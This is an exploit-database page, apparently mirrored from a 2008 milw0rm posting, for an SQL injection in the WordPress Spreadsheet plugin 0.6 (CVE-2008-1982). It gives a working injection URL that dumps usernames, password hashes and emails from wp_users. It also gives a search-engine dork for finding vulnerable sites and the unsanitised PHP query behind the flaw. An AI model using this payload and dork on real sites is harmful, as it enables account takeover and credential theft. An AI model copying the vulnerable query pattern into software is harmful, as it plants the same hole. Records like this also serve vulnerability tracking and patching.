Lucene search
+L

WordPress Plugin Spreadsheet 0.6 - SQL Injection

🗓️ 22 Apr 2008 00:00:00Reported by 1ten0.0net1Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 104 Views

WordPress Plugin Spreadsheet 0.6 SQL Injection vulnerability in ss_load.ph

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-1982
22 Apr 200800:00
circl
cve
CVE
CVE-2008-1982
27 Apr 200820:00
cve
cvelist
Cvelist
CVE-2008-1982
27 Apr 200820:00
cvelist
euvd
EUVD
EUVD-2008-1980
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-1982
27 Apr 200820:05
nvd
patchstack
Patchstack
WordPress Spreadsheet Plugin <= 0.6 - SQL Injection
27 Apr 200800:00
patchstack
prion
Prion
Sql injection
27 Apr 200820:05
prion
wpvulndb
WPVulnDB
Spreadsheet <= 0.6 - SQL Injection
1 Aug 201400:00
wpvulndb
===========================================
There's standart sql-injection in Spreadsheet <= 0.6 Plugin
# Author : 1ten0.0net1
# Script : Wordpress Plugin Spreadsheet <= 0.6 v.
# Download : http://timrohrer.com/blog/?page_id=71
# BUG :  Remote SQL-Injection Vulnerability
# Dork : inurl:/wp-content/plugins/wpSS/
Example:
http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain
===========================================
Vulnerable code:
ss_load.php
    $id = $_GET['ss_id'];
....
ss_functions.php:
function ss_load ($id, $plain=FALSE) {
....
    if ($wpdb->query("SELECT * FROM $table_name WHERE id='$id'") == 0) {
....

==> Visit us @ forum.antichat.ru

# milw0rm.com [2008-04-22]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Apr 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.03161
104